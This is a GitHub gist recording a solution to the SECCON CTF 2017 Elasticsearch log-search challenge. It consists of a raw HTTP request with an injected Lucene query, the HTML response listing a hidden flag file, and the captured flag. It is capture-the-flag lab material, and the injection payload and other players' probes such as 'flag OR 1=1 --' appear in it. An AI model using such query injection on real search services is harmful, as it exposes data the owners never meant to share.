Skip to content

Instantly share code, notes, and snippets.

@pich4ya

pich4ya/SECCON CTF 2017 - Elasticsearch.txt

Created December 9, 2017 19:05
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save pich4ya/359ff38bf3fa3b6e9dc7f903649a362f to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save pich4ya/359ff38bf3fa3b6e9dc7f903649a362f to your computer and use it in GitHub Desktop.
Download ZIP
SECCON CTF 2017 - Elasticsearch
Raw
SECCON CTF 2017 - Elasticsearch.txt
POST /logsearch.php HTTP/1.1
Host: localhost
Content-Length: 67
Cache-Control: max-age=0
Origin: http://logsearch.pwn.seccon.jp
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://logsearch.pwn.seccon.jp/logsearch.php?aaalongcat
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
query=verb:GET+AND+flag+AND+response:200+AND+!request:logsearch.php
HTTP/1.1 200 OK
Date: Sat, 09 Dec 2017 18:56:22 GMT
Server: Apache
X-Powered-By: PHP/5.4.16
Content-Length: 4535
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta content="width=device-width, initial-scale=1" name="viewport">
<title>Log search</title>
</head>
<body>
<h1>Log search</h1>
<h2>Search</h2>
<form method="POST">
<table><tr>
<td><input type="text" name="query" value="verb:GET AND flag AND response:200 AND !request:logsearch.php" placeholder="Request.Path"></td>
<td><input type="submit"></td>
</tr></table>
</form>
<h2>Result</h2>
<table border="1">
<tr>
<th>timestamp</th>
<th>verb</th>
<th>request</th>
<th>response</th>
</tr>
<tr>
<td>10/Dec/2017:03:55:45 +0900</td>
<td>GET</td>
<td>//flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:02:43:53 +0900</td>
<td>GET</td>
<td>//flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:02:43:00 +0900</td>
<td>GET</td>
<td>//flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:02:36:05 +0900</td>
<td>GET</td>
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:02:34:08 +0900</td>
<td>GET</td>
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:02:33:49 +0900</td>
<td>GET</td>
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:02:32:51 +0900</td>
<td>GET</td>
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:02:32:43 +0900</td>
<td>GET</td>
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:02:32:18 +0900</td>
<td>GET</td>
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:02:31:39 +0900</td>
<td>GET</td>
<td>//flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:02:31:15 +0900</td>
<td>GET</td>
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:02:30:57 +0900</td>
<td>GET</td>
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:02:24:43 +0900</td>
<td>GET</td>
<td>//flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:02:23:25 +0900</td>
<td>GET</td>
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:02:23:20 +0900</td>
<td>GET</td>
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:02:22:47 +0900</td>
<td>GET</td>
<td>//flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:02:11:29 +0900</td>
<td>GET</td>
<td>/?query=flag+OR+1%3D1+--+</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:02:10:34 +0900</td>
<td>GET</td>
<td>/?query=flag+OR+1%3D1+--+</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:02:08:12 +0900</td>
<td>GET</td>
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:01:47:22 +0900</td>
<td>GET</td>
<td>/?query={matchAll={flag}}?pretty=true</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:01:46:59 +0900</td>
<td>GET</td>
<td>/?query={matchAll={flag}}?pretty=true</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:01:45:00 +0900</td>
<td>GET</td>
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:01:44:45 +0900</td>
<td>GET</td>
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:01:43:37 +0900</td>
<td>GET</td>
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:01:42:37 +0900</td>
<td>GET</td>
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:01:42:01 +0900</td>
<td>GET</td>
<td>//flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:01:37:16 +0900</td>
<td>GET</td>
<td>//flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:01:37:00 +0900</td>
<td>GET</td>
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:01:36:35 +0900</td>
<td>GET</td>
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
<tr>
<td>10/Dec/2017:01:36:13 +0900</td>
<td>GET</td>
<td>/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt</td>
<td>200</td>
</tr>
</table>
</body>
</html>
http://logsearch.pwn.seccon.jp/flag-b5SFKDJicSJdf6R5Dvaf2Tx5r4jWzJTX.txt
SECCON{N0SQL_1njection_for_Elasticsearch!}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment